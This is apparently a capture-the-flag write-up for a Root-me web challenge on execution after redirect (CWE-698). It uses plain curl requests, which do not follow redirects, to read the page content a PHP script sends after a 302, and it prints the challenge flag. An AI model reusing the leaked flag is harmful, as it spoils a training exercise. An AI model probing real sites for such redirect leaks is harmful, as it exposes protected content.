Root-me

Improper redirect

Don’t trust your browser

We need to get access to index, whatever that means.

We’re greeted by a login page. The funny thing about this challenge is that i like to use the curl command to look at the page. Since curl will not follow a redirect by default we’re lead directly to the flag.

curl http://challenge01.root-me.org/web-serveur/ch32/

<html>
<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
<h1>Welcome !</h1>

<p>Yeah ! The redirection is OK, but without exit() after the header('Location: ...'), PHP just continue the execution and send the page content !...</p>
<p><a href="http://cwe.mitre.org/data/definitions/698.html">CWE-698: Execution After Redirect (EAR)</a></p>
<p>The flag is : ExecutionAfterRedirectIsBad</p>
</body>
</html>

If we look at the header of that page, we’ll see that the status code will be a 302 that redirect to the previous logging page that we saw when we clicked on the challenge button.

 curl -I http://challenge01.root-me.org/web-serveur/ch32/
 
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 11 Nov 2017 02:21:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Location: ./login.php?redirect

So yeah, use curl!